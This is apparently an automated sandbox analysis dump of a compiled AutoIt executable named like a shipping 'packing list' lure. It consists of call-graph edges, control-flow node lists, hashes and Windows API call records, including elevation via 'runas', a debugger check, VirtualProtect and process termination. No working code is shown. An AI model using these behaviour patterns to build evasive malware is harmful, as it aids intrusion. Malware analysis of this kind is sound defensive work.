b8e871 96546 b3fe30 334 API calls 96545->96546 96547 b8e8cf 96546->96547 96547->96544 96548 b8e96a 96547->96548 96550 b8e916 96547->96550 96549 b8e978 96548->96549 96552 b8e9c7 96548->96552 96687 b7a69d 48 API calls 96549->96687 96686 b79b72 48 API calls 96550->96686 96552->96544 96555 b3936c 81 API calls 96552->96555 96554 b8e949 96557 b445e0 334 API calls 96554->96557 96558 b8e9e1 96555->96558 96556 b8e99b 96688 b3bc74 48 API calls 96556->96688 96557->96544 96560 b3bdfa 48 API calls 96558->96560 96562 b8ea05 CharUpperBuffW 96560->96562 96561 b8e9a3 Mailbox 96564 b43200 334 API calls 96561->96564 96563 b8ea1f 96562->96563 96565 b8ea72 96563->96565 96566 b8ea26 96563->96566 96564->96544 96567 b3936c 81 API calls 96565->96567 96689 b79b72 48 API calls 96566->96689 96579->96378 96641->96487 96642->96508 96680 b76529 96679->96680 96681 b76cc4 FindFirstFileW 96679->96681 96680->96378 96681->96680 96682 b76cd9 FindClose 96681->96682 96682->96680 96683->96537 96684->96544 96685->96545 96686->96554 96687->96556 96688->96561 96693 b3bd3f 96692->96693 96696 b3bd5a 96692->96696 96694 b3bdfa 48 API calls 96693->96694 96695 b3bd47 CharUpperBuffW 96694->96695 96695->96696 96696->96398 96698 ba436a 96697->96698 96699 b32b8b 96697->96699 96700 b4f4ea 48 API calls 96699->96700 96701 b32b92 96700->96701 96702 b32bb3 96701->96702 96714 b32bce 48 API calls 96701->96714 96702->96404 96704->96404 96705->96404 96706->96404 96707->96404 96708->96404 96709->96404 96710->96404 96711->96404 96712->96404 96713->96404 96714->96702 96715->96452 96716->96452 96717->96453 96718->96453 96719->96449 96720->96444 96721->96457 96722 b41799 96723 b4f4ea 48 API calls 96722->96723 96724 b4173a 96723->96724 96725 ba19cb 96730 b32322 96725->96730 96727 ba19d1 96763 b50f0a 52 API calls __cinit 96727->96763 96729 ba19db 96731 b32344 96730->96731 96764 b326df 96731->96764 96736 b3d7f7 48 API calls 96737 b32384 96736->96737 96738 b3d7f7 48 API calls 96737->96738 96739 b3238e 96738->96739 96740 b3d7f7 48 API calls 96739->96740 96741 b32398 96740->96741 96742 b3d7f7 48 API calls 96741->96742 96743 b323de 96742->96743 96744 b3d7f7 48 API calls 96743->96744 96745 b324c1 96744->96745 96772 b3263f 96745->96772 96749 b324f1 96750 b3d7f7 48 API calls 96749->96750 96751 b324fb 96750->96751 96801 b32745 96751->96801 96753 b32546 96754 b32556 GetStdHandle 96753->96754 96755 b325b1 96754->96755 96756 ba501d 96754->96756 96757 b325b7 CoInitialize 96755->96757 96756->96755 96758 ba5026 96756->96758 96757->96727 96808 b792d4 53 API calls 96758->96808 96760 ba502d 96809 b799f9 CreateThread 96760->96809 96762 ba5039 CloseHandle 96762->96757 96763->96729 96810 b32854 96764->96810 96767 b36a63 48 API calls 96768 b3234a 96767->96768 96769 b3272e 96768->96769 96824 b327ec 6 API calls 96769->96824 96771 b3237a 96771->96736 96773 b3d7f7 48 API calls 96772->96773 96774 b3264f 96773->96774 96775 b3d7f7 48 API calls 96774->96775 96776 b32657 96775->96776 96825 b326a7 96776->96825 96779 b326a7 48 API calls 96780 b32667 96779->96780 96781 b3d7f7 48 API calls 96780->96781 96782 b32672 96781->96782 96783 b4f4ea 48 API calls 96782->96783 96784 b324cb 96783->96784 96785 b322a4 96784->96785 96786 b322b2 96785->96786 96787 b3d7f7 48 API calls 96786->96787 96788 b322bd 96787->96788 96789 b3d7f7 48 API calls 96788->96789 96790 b322c8 96789->96790 96791 b3d7f7 48 API calls 96790->96791 96792 b322d3 96791->96792 96793 b3d7f7 48 API calls 96792->96793 96794 b322de 96793->96794 96795 b326a7 48 API calls 96794->96795 96796 b322e9 96795->96796 96797 b4f4ea 48 API calls 96796->96797 96798 b322f0 96797->96798 96799 b322f9 RegisterWindowMessageW 96798->96799 96800 ba1fe7 96798->96800 96799->96749 96802 b32755 96801->96802 96803 ba5f4d 96801->96803 96804 b4f4ea 48 API calls 96802->96804 96830 b7c942 50 API calls 96803->96830 96807 b3275d 96804->96807 96806 ba5f58 96807->96753 96808->96760 96809->96762 96831 b799df 54 API calls 96809->96831 96817 b32870 96810->96817 96813 b32870 48 API calls 96814 b32864 96813->96814 96815 b3d7f7 48 API calls 96814->96815 96816 b32716 96815->96816 96816->96767 96818 b3d7f7 48 API calls 96817->96818 96819 b3287b 96818->96819 96820 b3d7f7 48 API calls 96819->96820 96821 b32883 96820->96821 96822 b3d7f7 48 API calls 96821->96822 96823 b3285c 96822->96823 96823->96813 96824->96771 96826 b3d7f7 48 API calls 96825->96826 96827 b326b0 96826->96827 96828 b3d7f7 48 API calls 96827->96828 96829 b3265f 96828->96829 96829->96779 96830->96806 96832 b33742 96833 b3374b 96832->96833 96834 b33769 96833->96834 96835 b337c8 96833->96835 96871 b337c6 96833->96871 96836 b33776 96834->96836 96837 b3382c PostQuitMessage 96834->96837 96839 ba1e00 96835->96839 96840 b337ce 96835->96840 96842 ba1e88 96836->96842 96843 b33781 96836->96843 96844 b337b9 96837->96844 96838 b337ab DefWindowProcW 96838->96844 96887 b32ff6 16 API calls 96839->96887 96845 b337d3 96840->96845 96846 b337f6 SetTimer RegisterWindowMessageW 96840->96846 96892 b74ddd 60 API calls _memset 96842->96892 96848 b33836 96843->96848 96849 b33789 96843->96849 96852 ba1da3 96845->96852 96853 b337da KillTimer 96845->96853 96846->96844 96850 b3381f CreatePopupMenu 96846->96850 96847 ba1e27 96888 b4e312 335 API calls Mailbox 96847->96888 96877 b4eb83 96848->96877 96855 ba1e6d 96849->96855 96856 b33794 96849->96856 96850->96844 96859 ba1da8 96852->96859 96860 ba1ddc MoveWindow 96852->96860 96884 b33847 Shell_NotifyIconW _memset 96853->96884 96855->96838 96891 b6a5f3 48 API calls 96855->96891 96862 b3379f 96856->96862 96863 ba1e58 96856->96863 96857 ba1e9a 96857->96838 96857->96844 96864 ba1dcb SetFocus 96859->96864 96865 ba1dac 96859->96865 96860->96844 96862->96838 96889 b33847 Shell_NotifyIconW _memset 96862->96889 96890 b755bd 70 API calls _memset 96863->96890 96864->96844 96865->96862 96869 ba1db5 96865->96869 96866 b337ed 96885 b3390f DeleteObject DestroyWindow Mailbox 96866->96885 96886 b32ff6 16 API calls 96869->96886 96871->96838 96873 ba1e68 96873->96844 96875 ba1e4c 96876 b34ffc 67 API calls 96875->96876 96876->96871 96878 b4ec1c 96877->96878 96879 b4eb9a _memset 96877->96879 96878->96844 96880 b351af 50 API calls 96879->96880 96883 b4ebc1 96880->96883 96881 b4ec05 KillTimer SetTimer 96881->96878 96882 ba3c7a Shell_NotifyIconW 96882->96881 96883->96881 96883->96882 96884->96866 96885->96844 96886->96844 96887->96847 96888->96862 96889->96875 96890->96873 96891->96871 96892->96857 96893 b3ef80 96894 b43b70 335 API calls 96893->96894 96895 b3ef8c 96894->96895 96896 ba9bec 96919 b40ae0 Mailbox ___crtGetEnvironmentStringsW 96896->96919 96898 b41526 Mailbox 96988 b7cc5c 86 API calls 4 library calls 96898->96988 96901 b4f4ea 48 API calls 96923 b3fec8 96901->96923 96902 b415b5 96989 b7cc5c 86 API calls 4 library calls 96902->96989 96903 b40509 96991 b7cc5c 86 API calls 4 library calls 96903->96991 96905 b4146e 96911 b36eed 48 API calls 96905->96911 96907 b41473 96990 b7cc5c 86 API calls 4 library calls 96907->96990 96909 baa246 96913 b36eed 48 API calls 96909->96913 96925 b3ffe1 Mailbox 96911->96925 96912 baa922 96913->96925 96916 b36eed 48 API calls 96916->96923 96917 baa873 96918 b3d7f7 48 API calls 96918->96923 96919->96898 96922 b3ce19 48 API calls 96919->96922 96919->96923 96919->96925 96930 b8e822 335 API calls 96919->96930 96931 b4f4ea 48 API calls 96919->96931 96932 b3fe30 335 API calls 96919->96932 96933 baa706 96919->96933 96935 b697ed InterlockedDecrement 96919->96935 96938 b86ff0 335 API calls 96919->96938 96939 b90d1d 96919->96939 96942 b90d09 96919->96942 96945 b8f0ac 96919->96945 96977 b7a6ef 96919->96977 96985 b8ef61 82 API calls 2 library calls 96919->96985 96920 baa30e 96920->96925 96986 b697ed InterlockedDecrement 96920->96986 96921 b697ed InterlockedDecrement 96921->96923 96922->96919 96923->96901 96923->96902 96923->96903 96923->96905 96923->96907 96923->96909 96923->96916 96923->96918 96923->96920 96923->96921 96924 b50f0a 52 API calls __cinit 96923->96924 96923->96925 96927 baa973 96923->96927 96983 b41820 335 API calls 2 library calls 96923->96983 96984 b41d10 59 API calls Mailbox 96923->96984 96924->96923 96992 b7cc5c 86 API calls 4 library calls 96927->96992 96929 baa982 96930->96919 96931->96919 96932->96919 96987 b7cc5c 86 API calls 4 library calls 96933->96987 96935->96919 96938->96919 96993 b8f8ae 96939->96993 96941 b90d2d 96941->96919 96943 b8f8ae 129 API calls 96942->96943 96944 b90d19 96943->96944 96944->96919 96946 b3d7f7 48 API calls 96945->96946 96947 b8f0c0 96946->96947 96948 b3d7f7 48 API calls 96947->96948 96949 b8f0c8 96948->96949 96950 b3d7f7 48 API calls 96949->96950 96951 b8f0d0 96950->96951 96952 b3936c 81 API calls 96951->96952 96963 b8f0de 96952->96963 96953 b8f2f9 Mailbox 96953->96919 96954 b36a63 48 API calls 96954->96963 96956 b8f2b3 96958 b3518c 48 API calls 96956->96958 96957 b36eed 48 API calls 96957->96963 96960 b8f2c0 96958->96960 96959 b8f2ce 96962 b3518c 48 API calls 96959->96962 96965 b3510d 48 API calls 96960->96965 96961 b3c799 48 API calls 96961->96963 96966 b8f2dd 96962->96966 96963->96953 96963->96954 96963->96956 96963->96957 96963->96959 96963->96961 96964 b3bdfa 48 API calls 96963->96964 96967 b3bdfa 48 API calls 96963->96967 96969 b8f2cc 96963->96969 96974 b3936c 81 API calls 96963->96974 96975 b3518c 48 API calls 96963->96975 96976 b3510d 48 API calls 96963->96976 96968 b8f175 CharUpperBuffW 96964->96968 96965->96969 96970 b3510d 48 API calls 96966->96970 96971 b8f23a CharUpperBuffW 96967->96971 96972 b3d645 53 API calls 96968->96972 96969->96953 97095 b36b68 48 API calls 96969->97095 96970->96969 97094 b4d922 55 API calls 2 library calls 96971->97094 96972->96963 96974->96963 96975->96963 96976->96963 96978 b7a6fb 96977->96978 96979 b4f4ea 48 API calls 96978->96979 96980 b7a709 96979->96980 96981 b7a717 96980->96981 96982 b3d7f7 48 API calls 96980->96982 96981->96919 96982->96981 96983->96923 96984->96923 96985->96919 96986->96925 96987->96898 96988->96925 96989->96925 96990->96917 96991->96912 96992->96929 96994 b3936c 81 API calls 96993->96994 96995 b8f8ea 96994->96995 97017 b8f92c Mailbox 96995->97017 97029 b90567 96995->97029 96997 b8fb8b 96998 b8fcfa 96997->96998 97003 b8fb95 96997->97003 97077 b90688 89 API calls Mailbox 96998->97077 97001 b8fd07 97002 b8fd13 97001->97002 97001->97003 97002->97017 97042 b8f70a 97003->97042 97004 b3936c 81 API calls 97019 b8f984 Mailbox 97004->97019 97009 b8fbc9 97056 b4ed18 97009->97056 97012 b8fbfd 97014 b4c050 48 API calls 97012->97014 97013 b8fbe3 97075 b7cc5c 86 API calls 4 library calls 97013->97075 97018 b8fc14 97014->97018 97016 b8fbee GetCurrentProcess TerminateProcess 97016->97012 97017->96941 97020 b41b90 48 API calls 97018->97020 97028 b8fc3e 97018->97028 97019->96997 97019->97004 97019->97017 97073 b929e8 48 API calls ___crtGetEnvironmentStringsW 97019->97073 97074 b8fda5 60 API calls 2 library calls 97019->97074 97022 b8fc2d 97020->97022 97021 b8fd65 97021->97017 97025 b8fd7e FreeLibrary 97021->97025 97023 b9040f 105 API calls 97022->97023 97023->97028 97024 b41b90 48 API calls 97024->97028 97025->97017 97028->97021 97028->97024 97060 b9040f 97028->97060 97076 b3dcae 50 API calls Mailbox 97028->97076 97030 b3bdfa 48 API calls 97029->97030 97031 b90582 CharLowerBuffW 97030->97031 97078 b71f11 97031->97078 97035 b3d7f7 48 API calls 97036 b905bb 97035->97036 97085 b369e9 48 API calls ___crtGetEnvironmentStringsW 97036->97085 97038 b905d2 97039 b3b18b 48 API calls 97038->97039 97040 b905de Mailbox 97039->97040 97041 b9061a Mailbox 97040->97041 97086 b8fda5 60 API calls 2 library calls 97040->97086 97041->97019 97043 b8f725 97042->97043 97047 b8f77a 97042->97047 97044 b4f4ea 48 API calls 97043->97044 97046 b8f747 97044->97046 97045 b4f4ea 48 API calls 97045->97046 97046->97045 97046->97047 97048 b90828 97047->97048 97049 b90a53 Mailbox 97048->97049 97055 b9084b _strcat _wcscpy __wsetenvp 97048->97055 97049->97009 97050 b3cf93 58 API calls 97050->97055 97051 b3d286 48 API calls 97051->97055 97052 b3936c 81 API calls 97052->97055 97053 b5395c 47 API calls __crtLCMapStringA_stat 97053->97055 97055->97049 97055->97050 97055->97051 97055->97052 97055->97053 97089 b78035 50 API calls __wsetenvp 97055->97089 97058 b4ed2d 97056->97058 97057 b4edc5 VirtualProtect 97059 b4ed93 97057->97059 97058->97057 97058->97059 97059->97012 97059->97013 97061 b90427 97060->97061 97065 b90443 97060->97065 97062 b904f8 97061->97062 97063 b9044f 97061->97063 97064 b9042e 97061->97064 97061->97065 97093 b79dc5 103 API calls 97062->97093 97092 b3cdb9 48 API calls 97063->97092 97090 b77c56 50 API calls _strlen 97064->97090 97068 b51c9d _free 47 API calls 97065->97068 97071 b9051e 97065->97071 97068->97071 97070 b90438 97091 b3cdb9 48 API calls 97070->97091 97071->97028 97073->97019 97074->97019 97075->97016 97076->97028 97077->97001 97080 b71f3b __wsetenvp 97078->97080 97079 b71f79 97079->97035 97079->97040 97080->97079 97082 b71f6f 97080->97082 97084 b71ffa 97080->97084 97082->97079 97087 b4d37a 60 API calls 97082->97087 97084->97079 97088 b4d37a 60 API calls 97084->97088 97085->97038 97086->97041 97087->97082 97088->97084 97089->97055 97090->97070 97091->97065 97092->97065 97093->97065 97094->96963 97095->96953 97096 ba9c06 97107 b4d3be 97096->97107 97098 ba9c1c 97099 ba9c91 Mailbox 97098->97099 97116 b31caa 49 API calls 97098->97116 97101 b43200 335 API calls 97099->97101 97106 ba9cc5 97101->97106 97103 ba9c71 97103->97106 97117 b7b171 48 API calls 97103->97117 97104 baa7ab Mailbox 97106->97104 97118 b7cc5c 86 API calls 4 library calls 97106->97118 97108 b4d3dc 97107->97108 97109 b4d3ca 97107->97109 97111 b4d3e2 97108->97111 97112 b4d40b 97108->97112 97119 b3dcae 50 API calls Mailbox 97109->97119 97113 b4f4ea 48 API calls 97111->97113 97120 b3dcae 50 API calls Mailbox 97112->97120 97115 b4d3d4 97113->97115 97115->97098 97116->97103 97117->97099 97118->97104 97119->97115 97120->97115

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 643 b5b043-b5b080 call b5f8a0 646 b5b082-b5b084 643->646 647 b5b089-b5b08b 643->647 648 b5b860-b5b86c call b5a70c 646->648 649 b5b08d-b5b0a7 call b57bda call b57c0e call b56e10 647->649 650 b5b0ac-b5b0d9 647->650 649->648 652 b5b0e0-b5b0e7 650->652 653 b5b0db-b5b0de 650->653 658 b5b105 652->658 659 b5b0e9-b5b100 call b57bda call b57c0e call b56e10 652->659 653->652 657 b5b10b-b5b110 653->657 661 b5b112-b5b11c call b5f82f 657->661 662 b5b11f-b5b12d call b63bf2 657->662 658->657 686 b5b851-b5b854 659->686 661->662 673 b5b133-b5b145 662->673 674 b5b44b-b5b45d 662->674 673->674 677 b5b14b-b5b183 call b57a0d GetConsoleMode 673->677 678 b5b463-b5b473 674->678 679 b5b7b8-b5b7d5 WriteFile 674->679 677->674 700 b5b189-b5b18f 677->700 684 b5b479-b5b484 678->684 685 b5b55a-b5b55f 678->685 681 b5b7d7-b5b7df 679->681 682 b5b7e1-b5b7e7 GetLastError 679->682 687 b5b7e9 681->687 682->687 691 b5b81b-b5b833 684->691 692 b5b48a-b5b49a 684->692 688 b5b565-b5b56e 685->688 689 b5b663-b5b66e 685->689 699 b5b85e-b5b85f 686->699 697 b5b7ef-b5b7f1 687->697 688->691 698 b5b574 688->698 689->691 696 b5b674 689->696 694 b5b835-b5b838 691->694 695 b5b83e-b5b84e call b57c0e call b57bda 691->695 693 b5b4a0-b5b4a3 692->693 701 b5b4a5-b5b4be 693->701 702 b5b4e9-b5b520 WriteFile 693->702 694->695 703 b5b83a-b5b83c 694->703 695->686 704 b5b67e-b5b693 696->704 706 b5b856-b5b85c 697->706 707 b5b7f3-b5b7f5 697->707 708 b5b57e-b5b595 698->708 699->648 709 b5b191-b5b193 700->709 710 b5b199-b5b1bc GetConsoleCP 700->710 713 b5b4c0-b5b4ca 701->713 714 b5b4cb-b5b4e7 701->714 702->682 715 b5b526-b5b538 702->715 703->699 716 b5b699-b5b69b 704->716 706->699 707->691 718 b5b7f7-b5b7fc 707->718 719 b5b59b-b5b59e 708->719 709->674 709->710 711 b5b440-b5b446 710->711 712 b5b1c2-b5b1ca 710->712 711->707 720 b5b1d4-b5b1d6 712->720 713->714 714->693 714->702 715->697 721 b5b53e-b5b54f 715->721 722 b5b69d-b5b6b3 716->722 723 b5b6d8-b5b719 WideCharToMultiByte 716->723 725 b5b812-b5b819 call b57bed 718->725 726 b5b7fe-b5b810 call b57c0e call b57bda 718->726 727 b5b5a0-b5b5b6 719->727 728 b5b5de-b5b627 WriteFile 719->728 731 b5b1dc-b5b1fe 720->731 732 b5b36b-b5b36e 720->732 721->692 733 b5b555 721->733 734 b5b6b5-b5b6c4 722->734 735 b5b6c7-b5b6d6 722->735 723->682 737 b5b71f-b5b721 723->737 725->686 726->686 739 b5b5cd-b5b5dc 727->739 740 b5b5b8-b5b5ca 727->740 728->682 730 b5b62d-b5b645 728->730 730->697 742 b5b64b-b5b658 730->742 743 b5b217-b5b223 call b51688 731->743 744 b5b200-b5b215 731->744 745 b5b375-b5b3a2 732->745 746 b5b370-b5b373 732->746 733->697 734->735 735->716 735->723 747 b5b727-b5b75a WriteFile 737->747 739->719 739->728 740->739 742->708 749 b5b65e 742->749 765 b5b225-b5b239 743->765 766 b5b269-b5b26b 743->766 750 b5b271-b5b283 call b640f7 744->750 752 b5b3a8-b5b3ab 745->752 746->745 746->752 753 b5b75c-b5b776 747->753 754 b5b77a-b5b78e GetLastError 747->754 749->697 770 b5b435-b5b43b 750->770 771 b5b289 750->771 758 b5b3b2-b5b3c5 call b65884 752->758 759 b5b3ad-b5b3b0 752->759 753->747 761 b5b778 753->761 756 b5b794-b5b796 754->756 756->687 764 b5b798-b5b7b0 756->764 758->682 776 b5b3cb-b5b3d5 758->776 759->758 767 b5b407-b5b40a 759->767 761->756 764->704 772 b5b7b6 764->772 774 b5b412-b5b42d 765->774 775 b5b23f-b5b254 call b640f7 765->775 766->750 767->720 773 b5b410 767->773 770->687 777 b5b28f-b5b2c4 WideCharToMultiByte 771->777 772->697 773->770 774->770 775->770 785 b5b25a-b5b267 775->785 779 b5b3d7-b5b3ee call b65884 776->779 780 b5b3fb-b5b401 776->780 777->770 781 b5b2ca-b5b2f0 WriteFile 777->781 779->682 788 b5b3f4-b5b3f5 779->788 780->767 781->682 784 b5b2f6-b5b30e 781->784 784->770 787 b5b314-b5b31b 784->787 785->777 787->780 789 b5b321-b5b34c WriteFile 787->789 788->780 789->682 790 b5b352-b5b359 789->790 790->770 791 b5b35f-b5b366 790->791 791->780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d03b67e23b6f40ca7659386fbc39b880d56124615f436a27c7bc332f7e51d7f
                                                  • Instruction ID: 821940529e21ecfbb266b674ca8bd3c006cfa6c4e9b75837e41888070135069d
                                                  • Opcode Fuzzy Hash: 0d03b67e23b6f40ca7659386fbc39b880d56124615f436a27c7bc332f7e51d7f
                                                  • Instruction Fuzzy Hash: 55325F75B022288BDB249F14DC81BE9B7F5FF4A311F1841D9E80AA7A91D7709E84CF52

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00B33AA3,?), ref: 00B33D45
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,00B33AA3,?), ref: 00B33D57
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00BF1148,00BF1130,?,?,?,?,00B33AA3,?), ref: 00B33DC8
                                                    • Part of subcall function 00B36430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B33DEE,00BF1148,?,?,?,?,?,00B33AA3,?), ref: 00B36471
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00B33AA3,?), ref: 00B33E48
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00BE28F4,00000010), ref: 00BA1CCE
                                                  • SetCurrentDirectoryW.KERNEL32(?,00BF1148,?,?,?,?,?,00B33AA3,?), ref: 00BA1D06
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00BCDAB4,00BF1148,?,?,?,?,?,00B33AA3,?), ref: 00BA1D89
                                                  • ShellExecuteW.SHELL32(00000000,?,?,?,?,00B33AA3), ref: 00BA1D90
                                                    • Part of subcall function 00B33E6E: GetSysColorBrush.USER32(0000000F), ref: 00B33E79
                                                    • Part of subcall function 00B33E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00B33E88
                                                    • Part of subcall function 00B33E6E: LoadIconW.USER32(00000063), ref: 00B33E9E
                                                    • Part of subcall function 00B33E6E: LoadIconW.USER32(000000A4), ref: 00B33EB0
                                                    • Part of subcall function 00B33E6E: LoadIconW.USER32(000000A2), ref: 00B33EC2
                                                    • Part of subcall function 00B33E6E: RegisterClassExW.USER32(?), ref: 00B33F30
                                                    • Part of subcall function 00B336B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B336E6
                                                    • Part of subcall function 00B336B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B33707
                                                    • Part of subcall function 00B336B8: ShowWindow.USER32(00000000,?,?,?,?,00B33AA3,?), ref: 00B3371B
                                                    • Part of subcall function 00B336B8: ShowWindow.USER32(00000000,?,?,?,?,00B33AA3,?), ref: 00B33724
                                                    • Part of subcall function 00B34FFC: _memset.LIBCMT ref: 00B35022
                                                    • Part of subcall function 00B34FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B350CB
                                                  Strings
                                                  • runas, xrefs: 00BA1D84
                                                  • This is a third-party compiled AutoIt script., xrefs: 00BA1CC8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 438480954-3287110873
                                                  • Opcode ID: ee43ac2abeab355a2b4a5e7c78ce5239ccad204e5cff6620b86813bf8d274a42
                                                  • Instruction ID: 5d25dc2b9896145ee60a9f15203426665d28aebf7924740448a4c0282befe995
                                                  • Opcode Fuzzy Hash: ee43ac2abeab355a2b4a5e7c78ce5239ccad204e5cff6620b86813bf8d274a42
                                                  • Instruction Fuzzy Hash: E051E331A04248EACB11ABB9DC42EFE7BF9DB15B00F2049E5F641731A2DE745A49CB31

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1075 b4ddc0-b4de4f call b3d7f7 GetVersionExW call b36a63 call b4dfb4 call b36571 1084 b4de55-b4de56 1075->1084 1085 ba24c8-ba24cb 1075->1085 1088 b4de92-b4dea2 call b4df77 1084->1088 1089 b4de58-b4de63 1084->1089 1086 ba24cd 1085->1086 1087 ba24e4-ba24e8 1085->1087 1090 ba24d0 1086->1090 1091 ba24ea-ba24f3 1087->1091 1092 ba24d3-ba24dc 1087->1092 1102 b4dea4-b4dec1 GetCurrentProcess call b4df5f 1088->1102 1103 b4dec7-b4dee1 1088->1103 1093 ba244e-ba2454 1089->1093 1094 b4de69-b4de6b 1089->1094 1090->1092 1091->1090 1099 ba24f5-ba24f8 1091->1099 1092->1087 1097 ba245e-ba2464 1093->1097 1098 ba2456-ba2459 1093->1098 1100 ba2469-ba2475 1094->1100 1101 b4de71-b4de74 1094->1101 1097->1088 1098->1088 1099->1092 1104 ba247f-ba2485 1100->1104 1105 ba2477-ba247a 1100->1105 1106 b4de7a-b4de89 1101->1106 1107 ba2495-ba2498 1101->1107 1102->1103 1126 b4dec3 1102->1126 1109 b4df31-b4df3b GetSystemInfo 1103->1109 1110 b4dee3-b4def7 call b4e00c 1103->1110 1104->1088 1105->1088 1111 ba248a-ba2490 1106->1111 1112 b4de8f 1106->1112 1107->1088 1113 ba249e-ba24b3 1107->1113 1115 b4df0e-b4df1a 1109->1115 1123 b4df29-b4df2f GetSystemInfo 1110->1123 1124 b4def9-b4df01 call b4dff4 GetNativeSystemInfo 1110->1124 1111->1088 1112->1088 1117 ba24bd-ba24c3 1113->1117 1118 ba24b5-ba24b8 1113->1118 1119 b4df21-b4df26 1115->1119 1120 b4df1c-b4df1f FreeLibrary 1115->1120 1117->1088 1118->1088 1120->1119 1125 b4df03-b4df07 1123->1125 1124->1125 1125->1115 1129 b4df09-b4df0c FreeLibrary 1125->1129 1126->1103 1129->1115
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00B4DDEC
                                                  • GetCurrentProcess.KERNEL32(00000000,00BCDC38,?,?), ref: 00B4DEAC
                                                  • GetNativeSystemInfo.KERNELBASE(?,00BCDC38,?,?), ref: 00B4DF01
                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B4DF0C
                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B4DF1F
                                                  • GetSystemInfo.KERNEL32(?,00BCDC38,?,?), ref: 00B4DF29
                                                  • GetSystemInfo.KERNEL32(?,00BCDC38,?,?), ref: 00B4DF35
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                  • String ID:
                                                  • API String ID: 3851250370-0
                                                  • Opcode ID: 4a7350da81cf953f34d3eeddb1c47472ca1dea546d611fadf3b02845338b4100
                                                  • Instruction ID: b189947ac9154f27cda1c765917b6711bbbd9d9a02c4398f38570efa95502e7d
                                                  • Opcode Fuzzy Hash: 4a7350da81cf953f34d3eeddb1c47472ca1dea546d611fadf3b02845338b4100
                                                  • Instruction Fuzzy Hash: 07619FB180A384DBCF15CF6898C15E97FF4AF2A300B2989D9D8459F207DA34CA09DB65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1147 b3406b-b34083 CreateStreamOnHGlobal 1148 b340a3-b340a6 1147->1148 1149 b34085-b3409c FindResourceExW 1147->1149 1150 b340a2 1149->1150 1151 ba4f16-ba4f25 LoadResource 1149->1151 1150->1148 1151->1150 1152 ba4f2b-ba4f39 SizeofResource 1151->1152 1152->1150 1153 ba4f3f-ba4f4a LockResource 1152->1153 1153->1150 1154 ba4f50-ba4f6e 1153->1154 1154->1150
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B3449E,?,?,00000000,00000001), ref: 00B3407B
